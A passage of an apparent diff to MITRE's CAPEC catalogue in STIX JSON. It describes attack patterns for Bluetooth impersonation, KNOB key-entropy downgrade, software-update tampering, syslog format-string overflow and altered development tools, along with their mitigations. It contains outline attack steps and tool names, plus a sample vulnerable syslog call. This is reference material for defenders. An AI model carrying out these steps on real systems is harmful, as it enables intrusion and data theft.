"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d5dcbac0-5e5f-43b5-bafd-3e3255fe84b2", + "target_ref": "attack-pattern--c3ce7043-a2cc-4686-945c-cf3b605b7c90", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When using Bluetooth, set it to hidden or non-discoverable mode.", + "id": "course-of-action--140ba36d-41b8-4ced-a9f0-2faddb5e366c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-666-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--80201cde-dfb2-4b73-bfb8-7f01b83d2d4f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--140ba36d-41b8-4ced-a9f0-2faddb5e366c", + "target_ref": "attack-pattern--c3ce7043-a2cc-4686-945c-cf3b605b7c90", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary disguises the MAC address of their Bluetooth enabled device to one for which there exists an active and trusted connection and authenticates successfully. The adversary can then perform malicious actions on the target Bluetooth device depending on the target’s capabilities.", + "external_references": [ + { + "external_id": "CAPEC-667", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/667.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + } + ], + "id": "attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Bluetooth Impersonation AttackS (BIAS)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Confidentiality": [], + "Integrity": [] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find disguise and target: The adversary starts the Bluetooth service on the attacking device and searches for nearby listening devices.

  2. Techniques
    Knowledge of a trusted MAC address.
    Scanning for devices other than the target that may be trusted.

Experiment

  1. Disguise: Using the MAC address of the device the adversary wants to impersonate, they may use a tool such as spooftooth or macchanger to spoof their Bluetooth address and attempt to authenticate with the target.

Exploit

  1. Use device capabilities to accomplish goal: Finally, if authenticated successfully the adversary can perform tasks/information gathering dependent on the target's capabilities and connections.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Knowledge of a target device's list of trusted connections." + ], + "x_capec_skills_required": { + "Low": "Adversaries must be in close proximity to Bluetooth devices." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Disable Bluetooth in public places.", + "id": "course-of-action--2d13642f-44e3-480c-b907-c2114df19379", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-667-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b477928d-f597-4e68-8812-a8bc335d9bfb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2d13642f-44e3-480c-b907-c2114df19379", + "target_ref": "attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Verify incoming Bluetooth connections; do not automatically trust.", + "id": "course-of-action--c0001e8c-8758-4434-ba10-32c5b2334ce1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-667-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--51b85277-07df-4319-8d21-1fef2587765e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c0001e8c-8758-4434-ba10-32c5b2334ce1", + "target_ref": "attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Change default PIN passwords and always use one when connecting.", + "id": "course-of-action--c56e3d38-c305-47a5-bdfa-bc5c1c578973", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-667-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8e6624f4-6e7b-4594-8b02-e56c9aca7173", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c56e3d38-c305-47a5-bdfa-bc5c1c578973", + "target_ref": "attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary can exploit a flaw in Bluetooth key negotiation allowing them to decrypt information sent between two devices communicating via Bluetooth. The adversary uses an Adversary in the Middle setup to modify packets sent between the two devices during the authentication process, specifically the entropy bits. 
Knowledge of the number of entropy bits will allow the attacker to easily decrypt information passing over the line of communication.", + "external_references": [ + { + "external_id": "CAPEC-668", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/668.html" + }, + { + "external_id": "CWE-425", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/425.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "Data Manipulation: Transmitted Data Manipulation", + "external_id": "T1565.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1565/002" + }, + { + "description": "Jovi Umawing, Bluetooth vulnerability can be exploited in Key Negotiation of Bluetooth (KNOB) attacks, 2019--08---21, MalwareBytes", + "external_id": "REF-657", + "source_name": "reference_from_CAPEC", + "url": "https://blog.malwarebytes.com/awareness/2019/08/bluetooth-vulnerability-can-be-exploited-in-key-negotiation-of-bluetooth-knob-attacks/" + } + ], + "id": "attack-pattern--8c806dfa-b8ca-45f9-9f97-09e4b5c1157b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Key Negotiation of Bluetooth Attack (KNOB)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--86a5e931-7f53-46fe-b6f0-c88498f6557f", + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass 
Protection Mechanism" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Given users Alice, Bob and Charlie (Charlie being the attacker), Alice and Bob begin to agree on an encryption key when connecting. While Alice sends a message to Bob that an encryption key with 16 bytes of entropy should be used, Charlie changes this to 1 and forwards the request to Bob and continues forwarding these packets until authentication is successful." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Discovery: Using an established Person in the Middle setup, search for Bluetooth devices beginning the authentication process.

  2. Techniques
    Use packet capture tools.

Experiment

  1. Change the entropy bits: Upon recieving the initial key negotiation packet from the master, the adversary modifies the entropy bits requested to 1 to allow for easy decryption before it is forwarded.

Exploit

  1. Capture and decrypt data: Once the entropy of encryption is known, the adversary can capture data and then decrypt on their device.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Person in the Middle network setup." + ], + "x_capec_resources_required": [ + "Bluetooth adapter, packet capturing capabilities." + ], + "x_capec_skills_required": { + "Medium": "Ability to modify packets." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Newer Bluetooth firmwares ensure that the KNOB is not negotaited in plaintext. Update your device.", + "id": "course-of-action--c40ed234-cae5-4a4e-9080-d0b461edab63", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-668-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a7a3fb48-d2a9-46e6-b2e1-3e971c6ab1d9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c40ed234-cae5-4a4e-9080-d0b461edab63", + "target_ref": "attack-pattern--8c806dfa-b8ca-45f9-9f97-09e4b5c1157b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary with access to an organization’s software update infrastructure inserts malware into the content of an outgoing update to fielded systems where a wide range of malicious effects are possible. 
With the same level of access, the adversary can alter a software update to perform specific malicious acts including granting the adversary control over the software’s normal functionality.\n ", + "external_references": [ + { + "external_id": "CAPEC-669", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/669.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + }, + { + "description": "Defending Against Software Supply Chain Attacks, 2021--04, Cybersecurity and Infrastructure Security Agency (CISA)", + "external_id": "REF-658", + "source_name": "reference_from_CAPEC", + "url": "https://www.cisa.gov/sites/default/files/publications/defending_against_software_supply_chain_attacks_508_1.pdf" + }, + { + "description": "Dr. Charles Clancy, Joe Ferraro, Robert A. Martin, Adam G. Pennington, Christopher L. Sledjeski, Dr. Craig J. Wiener, Deliver Uncompromised: Securing Critical Software Supply Chains, 2021--01, The MITRE Corporation", + "external_id": "REF-659", + "source_name": "reference_from_CAPEC", + "url": "https://www.mitre.org/publications/technical-papers/deliver-uncompromised-securing-critical-software-supply-chains" + }, + { + "description": "Melinda Reed, John F. 
Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + } + ], + "id": "attack-pattern--69b5d398-114d-437d-a8db-06f1382012b7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Alteration of a Software Update", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--a7061d3b-6f93-440d-8b0d-4078e80eef88" + ], + "x_capec_child_of_refs": [ + "attack-pattern--582f33d6-0aa7-4f34-a91e-d767a65adad1" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "\n A subcontractor to a software developer injects maliciously altered software updates into an automated update process that distributes to government and commercial customers software containing a hidden backdoor.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify software with frequent updates: The adversary must first identify a target software that has updates at least with some frequency, enough that there is am update infrastructure.

Experiment

  1. Gain access to udpate infrastructure: The adversary must then gain access to the organization's software update infrastructure. This can either be done by gaining remote access from outside the organization, or by having a malicious actor inside the organization gain access. It is often easier if someone within the organization gains access.

Exploit

  1. Alter the software update: Through access to the software update infrastructure, an adversary will alter the software update by injecting malware into the content of an outgoing update.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An adversary would need to have penetrated an organization’s software update infrastructure including gaining access to components supporting the configuration management of software versions and updates related to the software maintenance of customer systems." + ], + "x_capec_skills_required": { + "High": "Skills required include the ability to infiltrate the organization’s software update infrastructure either from the Internet or from within the organization, including subcontractors, and be able to change software being delivered to customer/user systems in an undetected manner." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Have a Software Assurance Plan that includes maintaining strict configuration management control of source code, object code and software development, build and distribution tools; manual code reviews and static code analysis for developmental software; and tracking of all storage and movement of code.", + "id": "course-of-action--f7f5f2ab-7b9b-473b-9e09-91793b1951d8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-669-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b27d91b7-66f1-4a0d-a25b-c73cadad30b4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f7f5f2ab-7b9b-473b-9e09-91793b1951d8", + "target_ref": "attack-pattern--69b5d398-114d-437d-a8db-06f1382012b7", + 
"type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Require elevated privileges for distribution of software and software updates.", + "id": "course-of-action--16492a56-a1ff-45ac-9d60-937a2b5faa49", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-669-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b3576f50-4c2f-4c57-855a-1f4b066ac7ea", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--16492a56-a1ff-45ac-9d60-937a2b5faa49", + "target_ref": "attack-pattern--69b5d398-114d-437d-a8db-06f1382012b7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets applications and software that uses the syslog() function insecurely. If an application does not explicitely use a format string parameter in a call to syslog(), user input can be placed in the format string parameter leading to a format string injection attack. Adversaries can then inject malicious format string commands into the function call leading to a buffer overflow. 
There are many reported software vulnerabilities with the root cause being a misuse of the syslog() function.", + "external_references": [ + { + "external_id": "CAPEC-67", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/67.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-134", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/134.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "Format String", + "external_id": "06", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Format-String" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "scut, team teso, Exploiting Format String Vulnerabilities", + "external_id": "REF-503", + "source_name": "reference_from_CAPEC", + "url": "http://doc.bughunter.net/format-string/exploit-fs.html" + }, + { + "description": "Halvar Flake, Auditing binaries for security vulnerabilities", + "external_id": "REF-504", + "source_name": "reference_from_CAPEC", + "url": "http://www.blackhat.com/presentations/bh-europe-00/HalvarFlake/HalvarFlake.ppt" + }, + { + "description": "Fortify Taxonomy of Vulnerabilities, Fortify Software", + "external_id": "REF-505", + "source_name": "reference_from_CAPEC", + "url": "https://vulncat.hpefod.com/en" + }, + { + "description": "Syslog man page", + "external_id": "REF-506", + "source_name": "reference_from_CAPEC", + "url": "http://www.rt.com/man/syslog.3.html" + } + ], + "id": "attack-pattern--4cd18074-15c1-4206-8391-115685669623", + "modified": "2022-09-29T00:00:00.000Z", + "name": "String Format Overflow in syslog()", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "attack-pattern--cbabea0a-39ed-4a6f-b752-238fe8c730af" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + 
"Software" + ], + "x_capec_example_instances": [ + "Format string vulnerability in TraceEvent function for ntop before 2.1 allows remote adversaries to execute arbitrary code by causing format strings to be injected into calls to the syslog function, via (1) an HTTP GET request, (2) a user name in HTTP authentication, or (3) a password in HTTP authentication. See also: CVE-2002-0412" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary identifies a target application or program to perform the buffer overflow on. In this attack, adversaries look for applications that use syslog() incorrectly.

Experiment

  1. Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer. For each user-controllable input that the adversary suspects is vulnerable to format string injection, attempt to inject formatting characters such as %n, %s, etc.. The goal is to manipulate the string creation using these formatting characters.

  2. Techniques
    Inject probe payload which contains formatting characters (%s, %d, %n, etc.) through input parameters.
  3. Craft overflow content: The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary will craft a set of content that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the adversaries' choosing which points to code injected by the adversary.

  4. Techniques
    The formatting characters %s and %d are useful for observing memory and trying to print memory addresses. If an adversary has access to the log being written to they can observer this output and use it to help craft their attack.
    The formatting character %n is useful for adding extra data onto the buffer.

Exploit

  1. Overflow the buffer: Using the injection vector, the adversary supplies the program with the crafted format string injection, causing a buffer.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The Syslog function is used without specifying a format string argument, allowing user input to be placed direct into the function call as a format string." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n The code should be reviewed for misuse of the Syslog function call. Manual or automated code review can be used. The reviewer needs to ensure that all format string functions are passed a static string which cannot be controlled by the user and that the proper number of arguments are always sent to that function as well. If at all possible, do not use the %n operator in format strings. The following code shows a correct usage of Syslog():\n syslog(LOG_ERR, \"%s\", cmdBuf);\n The following code shows a vulnerable usage of Syslog():\n syslog(LOG_ERR, cmdBuf);\n // the buffer cmdBuff is taking user supplied data.\n \n \n ", + "id": "course-of-action--68dcbb61-cb52-4b46-944a-9941a87a33bf", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-67-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9f3d05ec-6c33-4384-aaa5-d2227378e659", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--68dcbb61-cb52-4b46-944a-9941a87a33bf", + "target_ref": "attack-pattern--4cd18074-15c1-4206-8391-115685669623", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + 
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary with the ability to alter tools used in a development environment causes software to be developed with maliciously modified tools. Such tools include requirements management and database tools, software design tools, configuration management tools, compilers, system build tools, and software performance testing and load testing tools. The adversary then carries out malicious acts once the software is deployed including malware infection of other systems to support further compromises.", + "external_references": [ + { + "external_id": "CAPEC-670", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/670.html" + }, + { + "description": "Trusted Developer Utilities Proxy Execution", + "external_id": "T1127", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1127" + }, + { + "description": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "Melinda Reed, John F. Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + }, + { + "description": "John F. 
Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor, 2020--12---13, Schneier on Security", + "external_id": "REF-667", + "source_name": "reference_from_CAPEC", + "url": "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" + } + ], + "id": "attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Software Development Tools Maliciously Altered", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--69b5d398-114d-437d-a8db-06f1382012b7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Modify Data", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "An adversary with access to software build tools inside an Integrated Development Environment IDE alters a script used for downloading dependencies from a dependent code repository where the script has been changed to include malicious code implanted in the repository by the adversary." 
+ ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary would need to have access to a targeted developer’s development environment and in particular to tools used to design, create, test and manage software, where the adversary could ensure malicious code is included in software packages built through alteration or substitution of tools in the environment used in the development of software." + ], + "x_capec_skills_required": { + "High": "Ability to leverage common delivery mechanisms (e.g., email attachments, removable media) to infiltrate a development environment to gain access to software development tools for the purpose of malware insertion into an existing tool or replacement of an existing tool with a maliciously altered copy." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Have a security concept of operations (CONOPS) for the development environment that includes: Maintaining strict security administration and configuration management of requirements management and database tools, software design tools, configuration management tools, compilers, system build tools, and software performance testing and load testing tools.", + "id": "course-of-action--eac781ab-b6c7-461d-8b6b-bef86f30b33a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-670-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--811480e0-f4e5-4e2a-8c32-b4c4872290a1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": 
"mitigates", + "source_ref": "course-of-action--eac781ab-b6c7-461d-8b6b-bef86f30b33a", + "target_ref": "attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid giving elevated privileges to developers.", + "id": "course-of-action--b2679adf-476c-4be7-b2ea-c1cb155f9145", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-670-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--59b5ad85-0960-462a-b666-4bbdcb872db3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b2679adf-476c-4be7-b2ea-c1cb155f9145", + "target_ref": "attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary with access to functional requirements for an application specific integrated circuit (ASIC), a chip designed/customized for a singular particular use, maliciously alters requirements derived from originating capability needs. 
